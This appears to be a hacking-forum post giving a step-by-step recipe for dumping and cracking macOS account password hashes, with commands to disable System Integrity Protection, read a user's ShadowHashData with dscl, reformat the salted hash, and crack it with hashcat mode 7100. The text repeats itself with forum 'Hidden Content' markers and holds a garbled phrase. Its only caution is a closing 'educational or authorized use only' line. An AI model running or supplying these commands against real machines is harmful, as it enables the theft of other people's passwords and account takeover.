Extracting password hashes on Linux or Windows is considered Hacking 101. Cracking macOS passwords, however, is trickier and discussed much less, so I felt the opportunity to do that here.
The first roadblock is Apple's System Integrity Protection (SIP). You will need to either disable it with 'csrutil disable', or, if FileVault 2 is not enabled, reboot in single-user needed. Another way is to use dscl.
sudo dscl . -read /Users/Bob/ dsAttrTypeNative:ShadowHashData | tail -n 1 | tr -dc '0-9a-f ' | xxd -p -r | plutil -convert xml1 - -o -
Grab the data of the hash and salt and convert the string from base64 to hex.
<hash> | base64 -D | xxd -p
Lastly, crack the hash with hashcat mode 7100
hashcat -m 7100 hash.txt -a 0 <hash> wordlist.txt
Enjoy, the article is intended for educational purposes or authorized use only
The first roadblock is Apple's System Integrity Protection (SIP). You will need to either disable it with 'csrutil disable', or, if FileVault 2 is not enabled, reboot in single-user needed. Another way is to use dscl.
[ Hidden Content! ]
sudo dscl . -read /Users/Bob/ dsAttrTypeNative:ShadowHashData | tail -n 1 | tr -dc '0-9a-f ' | xxd -p -r | plutil -convert xml1 - -o -
Grab the data of the hash and salt and convert the string from base64 to hex.
[ Hidden Content! ]
<hash> | base64 -D | xxd -p
Lastly, crack the hash with hashcat mode 7100
[ Hidden Content! ]
hashcat -m 7100 hash.txt -a 0 <hash> wordlist.txt
Enjoy, the article is intended for educational purposes or authorized use only
Likes 💓 +Reps are always appreciated but optional